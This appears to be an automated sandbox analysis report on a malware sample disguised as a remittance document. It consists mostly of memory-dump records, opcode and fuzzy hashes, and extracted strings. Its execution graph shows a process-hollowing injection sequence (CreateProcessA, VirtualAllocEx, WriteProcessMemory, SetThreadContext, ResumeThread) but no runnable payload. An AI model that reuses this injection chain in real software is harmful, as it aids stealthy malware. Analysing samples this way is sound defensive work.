                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28f2e405ae3d4a2aa8c85d5f37840ec1cabad1e0fcc53ad462c666e3e8e56f4c
                                            • Instruction ID: 29e6bd8ecb22b9db246c314b799180ead84c8c54237d4189a529775c4c325f3b
                                            • Opcode Fuzzy Hash: 28f2e405ae3d4a2aa8c85d5f37840ec1cabad1e0fcc53ad462c666e3e8e56f4c
                                            • Instruction Fuzzy Hash: 5A90023120540402D2007598540C646408597E4301F55D021A5024565EC6658A916232
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 956e05dbf65d155f1c881d8e0967aaa34f8894ee0247a2831f3b123a52c69477
                                            • Instruction ID: b0019aa808a69d84193683cdb93ebea296a2effbdc60f413d1e5046a61d19b3c
                                            • Opcode Fuzzy Hash: 956e05dbf65d155f1c881d8e0967aaa34f8894ee0247a2831f3b123a52c69477
                                            • Instruction Fuzzy Hash: B290026121540042D2047158440870640C597E5201F55C022A2154564CC5298E615226
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0acf6ae19f6300c8d9652fadf9dd69a018e72bb4cd9c58332527edf3fb8e5c1
                                            • Instruction ID: f864b18443a0edfed0e84c547d85f5b237481e0d9018cd1fbfda0afbd235b8f2
                                            • Opcode Fuzzy Hash: d0acf6ae19f6300c8d9652fadf9dd69a018e72bb4cd9c58332527edf3fb8e5c1
                                            • Instruction Fuzzy Hash: 9290026134540442D20071584418B064085D7E5301F55C025E1064564DC619CE526227
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d3356079e4a14460edc511dcf9f632559a9a65d89af16e7eeefd3e2e0f60375
                                            • Instruction ID: 58f012e976998c8dc401e633cc13b58ca5e5ea7db668f129e6ee0fb6ef475ec2
                                            • Opcode Fuzzy Hash: 4d3356079e4a14460edc511dcf9f632559a9a65d89af16e7eeefd3e2e0f60375
                                            • Instruction Fuzzy Hash: 65900221215C0042D30075684C18B07408597D4303F55C125A0154564CC9158A615622
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4945084bcc4f41c487c5b6446443d086aa23320b266fc29eada04b3e3068e623
                                            • Instruction ID: 739c321732dba9012e38cf2b32d836beefd677f7107fb53e9495fd8a799830c0
                                            • Opcode Fuzzy Hash: 4945084bcc4f41c487c5b6446443d086aa23320b266fc29eada04b3e3068e623
                                            • Instruction Fuzzy Hash: C1900221605400424240716888489068085BBE5211755C131A0998560DC5598A655766
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 22938d3d07b3828721598c48aa11e0754bc495d194196f119b4d1a5cdebb879c
                                            • Instruction ID: 343541812192e3b4146c2e7e5f1de85ec9707f9f44b46f9cd4121fb31787d9ad
                                            • Opcode Fuzzy Hash: 22938d3d07b3828721598c48aa11e0754bc495d194196f119b4d1a5cdebb879c
                                            • Instruction Fuzzy Hash: 7290023120580402D2007158480C747408597D4302F55C021A5164565EC665CA916632
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd0cb0d7c6fd0af7488173df00ba22d6b771ca3a03c4bad68a6f283dc802329f
                                            • Instruction ID: 93f132f1ce4e70174bd284c2947cc5210335972af77f8f9b62db66e2a1402c2a
                                            • Opcode Fuzzy Hash: bd0cb0d7c6fd0af7488173df00ba22d6b771ca3a03c4bad68a6f283dc802329f
                                            • Instruction Fuzzy Hash: 9E90023120580402D2007158481870B408597D4302F55C021A1164565DC6258A516672
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f4bbe34671e40cdc1efdd61437a1ee49bb841d2676d3a1db92fb44777455052
                                            • Instruction ID: 0b7cbeee2b5db61d00aa6656d752b2e56a7a8e864423670ac20e5fee51d1a5fa
                                            • Opcode Fuzzy Hash: 3f4bbe34671e40cdc1efdd61437a1ee49bb841d2676d3a1db92fb44777455052
                                            • Instruction Fuzzy Hash: 8090022130540402D202715844186064089D7D5345F95C022E1424565DC6258B53A233
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b57c990063abb18b29a0431b86ad0565c2b0824341bf6370c4b96f418285c45a
                                            • Instruction ID: cde3ee72c594a87bf053214cfda9430af3ad2c17828c20473fc34f394f4bf3df
                                            • Opcode Fuzzy Hash: b57c990063abb18b29a0431b86ad0565c2b0824341bf6370c4b96f418285c45a
                                            • Instruction Fuzzy Hash: 2790026120580403D24075584808607408597D4302F55C021A2064565ECA298E516236
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 74efe18c7d628f6087b605f9fde27375ab2b9aaefa9afab72100e28ac1d2eaab
                                            • Instruction ID: 8e52d4c3d4591f67d372dfe375267172aee8a9e01e83b6a780052256bd387eb9
                                            • Opcode Fuzzy Hash: 74efe18c7d628f6087b605f9fde27375ab2b9aaefa9afab72100e28ac1d2eaab
                                            • Instruction Fuzzy Hash: D890027120540402D24071584408746408597D4301F55C021A5064564EC6598FD56766
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 979ca67777c7ddba210517ea99413d33f596dd1518202b4ef7ef77cab9909ab7
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                            • Instruction ID: 74fad6ec5455cf71629af8be2d18d19d821f75ede45a8b59d2a52d845f259943
                                            • Opcode Fuzzy Hash: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                            • Instruction Fuzzy Hash: 0F51F9B5A0421ABFDB25DBACCC9097EFBF8BB082407148169F455E7646D374DF4187A0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                            • Instruction ID: 7e997d2febe126dace6dbb33cc9d665e1c2cc5b46bd2a691250507c46d86bfa7
                                            • Opcode Fuzzy Hash: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                            • Instruction Fuzzy Hash: 2951F575A08649AFCB20DE9CD89097EFBFAEF48300B048459F496C7641EAB4DB40C7A0
                                            Strings
                                            • Execute=1, xrefs: 01804713
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01804787
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01804655
                                            • ExecuteOptions, xrefs: 018046A0
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01804725
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018046FC
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01804742
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                            • Instruction ID: 14a3957569050ce24abca95974e5778a089ec17e6449d15975882edd4cc000dc
                                            • Opcode Fuzzy Hash: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                            • Instruction Fuzzy Hash: 4D51267160021DAAEF25AAA8DC99BAEF7B8EF14B00F0400EDD605A7181EB709B458F50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 60d5923a0da840c0473ac73ac1afda2e3b02cbcc376b00b8fb326f8d6b00d551
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 9D81A070E4524D9FEF258E6CC8917FEFBB1AF46360F1E425AE861A7291C7349840CB61
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                            • Instruction ID: 91eb755b2e585d7b8bae1926066ec4f3dd823c38b30fe142a21e609db9107605
                                            • Opcode Fuzzy Hash: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                            • Instruction Fuzzy Hash: CD21517AA0051DABDB10DF69D844AAEBBF9AF58744F040126F905E3204EB30EA01CBA1
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018002BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018002E7
                                            • RTL: Re-Waiting, xrefs: 0180031E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                            • Instruction ID: d67ed5f69d91113b7b4912a22249ac0df49a3e257da353add00a1df56c8e8430
                                            • Opcode Fuzzy Hash: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                            • Instruction Fuzzy Hash: CCE1BC306087469FD726CF28CC84B6ABBE0BB84B54F140A6DF5A5CB2E1D774DA44CB42
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 01807BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01807B7F
                                            • RTL: Resource at %p, xrefs: 01807B8E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                            • Instruction ID: 5a2b8700d80ca0c5a83a9a4779922a41d3f5936c0a56f32b8947b7a7f66ae4a7
                                            • Opcode Fuzzy Hash: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                            • Instruction Fuzzy Hash: 7041CF317047079BD721DE29CC51B6AB7E5EB98B10F000A1DFA9ADB780DB31E9058B92
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0180728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 018072C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01807294
                                            • RTL: Resource at %p, xrefs: 018072A3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                            • Instruction ID: 7050d5ca363e4ae562d84603a738396d11b9213e6a98642fd6bae2c3901d61db
                                            • Opcode Fuzzy Hash: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                            • Instruction Fuzzy Hash: 7341127160420AABC721CE29CC42B66F7A5FF94B50F10061CF996DB280DB30FA5687D1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                            • Instruction ID: 815873299e08316178778efd42b26061ff09c9749a755251a14a29620a59a8e0
                                            • Opcode Fuzzy Hash: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                            • Instruction Fuzzy Hash: C0314F72A0062D9FDB20DF2DDC44BAEB7F9EB54710F54455AF949E3244EF30AA448BA0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 7545df9eb6f2718606692a5f984381c105600b05939f10efcecd7f129ac1c82d
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 8291B271E0021E9BEB38DF6DC881ABEFBB1EF44328F54455AE955E72C4E73089818761
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                            • Instruction ID: 77ce82aa303c67f46c016b86ca409547d03810b0bafd4f46f87e2d02fd2ec5d3
                                            • Opcode Fuzzy Hash: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                            • Instruction Fuzzy Hash: 76810C71D002699BDB35CB54CC45BEEB7B4AF48714F1041DAEA19B7680E7309E84CFA0

                                            Execution Graph

                                            Execution Coverage:11.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:373
                                            Total number of Limit Nodes:14
42183 6e484af 42182->42183 42185 6e44df0 VirtualAllocEx 42183->42185 42186 6e44de8 VirtualAllocEx 42183->42186 42184 6e4852e 42185->42184 42186->42184 42188 6e47b0f 42187->42188 42189 6e47b40 42188->42189 42193 6e4512d CreateProcessA 42188->42193 42194 6e45138 CreateProcessA 42188->42194 42190 6e481e7 42189->42190 42191 6e44eb0 WriteProcessMemory 42189->42191 42192 6e44ea8 WriteProcessMemory 42189->42192 42190->42004 42191->42190 42192->42190 42193->42189 42194->42189 42196 6e47d2e 42195->42196 42197 6e47cca 42196->42197 42198 6e44df0 VirtualAllocEx 42196->42198 42199 6e44de8 VirtualAllocEx 42196->42199 42197->42004 42198->42197 42199->42197 42201 6e44ef8 WriteProcessMemory 42200->42201 42203 6e44f4f 42201->42203 42203->42077 42205 6e44eb0 WriteProcessMemory 42204->42205 42207 6e44f4f 42205->42207 42207->42077 42209 6e44feb ReadProcessMemory 42208->42209 42211 6e4502f 42209->42211 42211->42082 42213 6e44fa0 ReadProcessMemory 42212->42213 42215 6e4502f 42213->42215 42215->42082 42217 6e44925 Wow64SetThreadContext 42216->42217 42219 6e4496d 42217->42219 42219->42088 42221 6e44925 Wow64SetThreadContext 42220->42221 42223 6e4496d 42221->42223 42223->42088 42225 6e443f8 ResumeThread 42224->42225 42227 6e44469 42225->42227 42227->42098 42229 6e44438 ResumeThread 42228->42229 42231 6e44469 42229->42231 42231->42098 42233 6e451c1 CreateProcessA 42232->42233 42235 6e45383 42233->42235 42237 6e451c1 CreateProcessA 42236->42237 42239 6e45383 42237->42239 42239->42239 42241 6e44e30 VirtualAllocEx 42240->42241 42243 6e44e6d 42241->42243 42243->42141 42245 6e44e30 VirtualAllocEx 42244->42245 42247 6e44e6d 42245->42247 42247->42141

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8aq$8aq$8aq$LR]q$LR]q$$]q
                                            • API String ID: 0-687213661
                                            • Opcode ID: 2123ddc456adc5aa8ae6a7aceb727f26fc2dcfe05814433716115f6a00bf210d
                                            • Instruction ID: e699b5b62194e3914e22a537a6ca47564cf45d00ba41169f074132a7690e395e
                                            • Opcode Fuzzy Hash: 2123ddc456adc5aa8ae6a7aceb727f26fc2dcfe05814433716115f6a00bf210d
                                            • Instruction Fuzzy Hash: B0120E30A09244DFCB25CFA8C9546AABFF1FF46302F1485ABE091DB392D7388946CB55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$ fbq$ fbq$ fbq$ fbq$ fbq$ fbq$Te]q$Te]q$Te]q$XX]q$XX]q$XX]q$XX]q$XX]q$XX]q$XX]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-2160474337
                                            • Opcode ID: b2c18fa067f90b9cb090f893ea742594abae57f82c712ec8d55089804c5c6e07
                                            • Instruction ID: d742b89c17d0f1fb0ab921c8908bfcb94a426e818ca4ce11351f54c1dccf714c
                                            • Opcode Fuzzy Hash: b2c18fa067f90b9cb090f893ea742594abae57f82c712ec8d55089804c5c6e07
                                            • Instruction Fuzzy Hash: 93228E30E00218CFDF258F98D554A6EBBB2BF84302F65855BE8829B395C7749D43CB95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1756099846
                                            • Opcode ID: d7e21e7181aeb19f44826ef9ccbc419edc787a8ab4aa687993e67a8ead40e440
                                            • Instruction ID: dd48f0b866ec1b9797aa144bec8dab10dc44efaf097652e7c1f2507bf57c6664
                                            • Opcode Fuzzy Hash: d7e21e7181aeb19f44826ef9ccbc419edc787a8ab4aa687993e67a8ead40e440
                                            • Instruction Fuzzy Hash: 9EF1AF74B40208DFDF249FA8D95976EBEE2AF89701F10846AE4529B384DE748C42CB95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$ fbq$Te]q$XX]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1505870616
                                            • Opcode ID: 9374def10d0ca11d27e956ecee9bac3a563b16fc95040fadebd3f8014f0eb2b2
                                            • Instruction ID: 3f8e74a717ba776f32923b4de22ce97a44a9dc3a491a78457509b62271dfede6
                                            • Opcode Fuzzy Hash: 9374def10d0ca11d27e956ecee9bac3a563b16fc95040fadebd3f8014f0eb2b2
                                            • Instruction Fuzzy Hash: DB818E30E04218DFDF3A8E98D544AAEBBB2BB41712F66815BE4826B395D7349C43CF41

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$ fbq$Te]q$XX]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1505870616
                                            • Opcode ID: ccf27621df59362b101641a3ded5d8e6f5bc46a4f1aa1650741144b5f607d1b8
                                            • Instruction ID: 84a328081137168e539cd9878b5add912c4ca55061f37c058f4d82dbf4c48f4f
                                            • Opcode Fuzzy Hash: ccf27621df59362b101641a3ded5d8e6f5bc46a4f1aa1650741144b5f607d1b8
                                            • Instruction Fuzzy Hash: 83715F30E04218DFDF3A8E99D544A6EBBB2AB40712F36855BE482AB395D7349C43CF51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$$]q$$]q
                                            • API String ID: 0-3261640282
                                            • Opcode ID: bd29b4dc6fad9e0f82876997adb33d767e79116a69d39cc36772932b3c1ec88a
                                            • Instruction ID: a3a3f4811f4b4b9ba6ce0bdbd1042cd81bb61d210f8a02e4135c4bc15fc50c7d
                                            • Opcode Fuzzy Hash: bd29b4dc6fad9e0f82876997adb33d767e79116a69d39cc36772932b3c1ec88a
                                            • Instruction Fuzzy Hash: 60E19074F00208DFDF249F68D95976EBEE2AF89712F10846AE4529B384DF748C42CB95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
                                            • API String ID: 0-2875722158
                                            • Opcode ID: 17d078797158918e3fc88a574760bdbea8988b7507381a9fd65b8d41e2031847
                                            • Instruction ID: 40ceca9a9283565571e04ff811ed74b899a89fe9ca23a4a0fd92205d9ccf5b9b
                                            • Opcode Fuzzy Hash: 17d078797158918e3fc88a574760bdbea8988b7507381a9fd65b8d41e2031847
                                            • Instruction Fuzzy Hash: 9F717A71A0411CCFDF248F6CC454BBEBFF2AB56316F08857BE496AB391C63899418B61

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$$]q
                                            • API String ID: 0-2603884067
